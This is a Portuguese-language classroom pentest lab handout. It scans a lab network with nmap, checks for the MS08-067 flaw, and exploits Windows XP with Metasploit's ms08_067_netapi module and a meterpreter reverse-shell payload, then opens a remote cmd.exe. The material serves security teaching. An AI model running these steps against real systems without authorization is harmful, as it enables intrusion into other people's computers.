8/7/2019 Pratica-3 - metasploit
1/4
Prtica Usando MetasploitProf. Ramon Mota CTS-SEI-2010.1
Aula prtica PENTEST
Ambiente da aula:Duas esto de trabalho com MS Windows XP Home Edition Service Pack 2;Quatro estaes com live DVD BackTrack 4 final;
Ferramentas utilizadas:Metasploit 3.3;nmap;Utilitrios de linha de comando do MS Windows (cmd, mkdir, etc);
Exploit Meterpreter;
Buscando o alvoPara realizar um mapeamento da rede e saber quais estaes esto ativas ns iremos usar oNMAP.
#nmap -v 192.168.0.0/24
Aps identificar os possveis alvos (estaes Windows), vamos verificar qual a verso do sistemaoperacional:
#nmap -O 192.168.0.XX Usar o endereo IP dos possveis alvos!
Nosso alvo ser um MS Windows XP com SP2
Iremos explorar a seguinte vulnerabilidadehttp://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/info
Vamos ento usar o NMAP para identificar se o nosso alvo possui a vulnerabilidade descrita noslinks acima:
#nmap -v --script=smb-check-vulns 192.168.0.XX IP do alvo!
Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 1/4
FP.AC.014.00
http://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/infohttp://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/info8/7/2019 Pratica-3 - metasploit
2/4
Aps detectar a vulnerabilidade do sistema, vamos ento iniciar as atividade com o Metasploit(www.metasploit .com ):
Vamos iniciar o MSF no modo console:#msfconsole
Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 2/4
FP.AC.014.00
http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/http://www.metasploit.com/8/7/2019 Pratica-3 - metasploit
3/4
Vamos ento selecionar o exploit que queremos utilizar:
msf > use exploit/windows/smb/ms08_067_netapi Este explora a vulnerabilidade dos links!msf > set RHOST 192.168.0.XX Determina o IP do alvo.
msf > set PAYLOAD windows/meterpreter/reverse_tcp Cdigo malicioso.msf > set LHOST 192.168.0.YY O seu IP.msf > exploit
PRONTO!!!!!
Se tudo deu certo j estamos dentro do sistema alvo.
Execute o ? para obter ajuda para os comando do METERPRETER:
meterpreter > ?
meterpreter > sysinfo
Vamos agora executar o CMD.EXE na mquina remota:
meterpreter > execute -f cmd.exe -c Vai executar o cmd.exe da mquinaremota no prompt atual.meterpreter > interact 1 Trs a sesso para o canal 1.
Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 3/4
FP.AC.014.00
8/7/2019 Pratica-3 - metasploit
4/4
Agora pessoal s usar a mente brilhante e ter boas ideia.
PARABNS!!!!!
REFERNCIAS
http://www.microsoft.com/brasil/windowsxp/using/helpandsupport/learnmore/ballew_commandline.mspxhttp://pt.wikipedia.org/wiki/Lista_de_comandos_do_MS-DOShttp://www.microsoft.com/technet/security/Bulletin/MS08-067.mspxhttp://www.securityfocus.com/bid/31874/infohttp://www.metasploit.comhttp://nmap.org/
Faculdade de Tecnologia IBRATEC de Joo Pessoa Pgina 4/4
FP.AC.014.00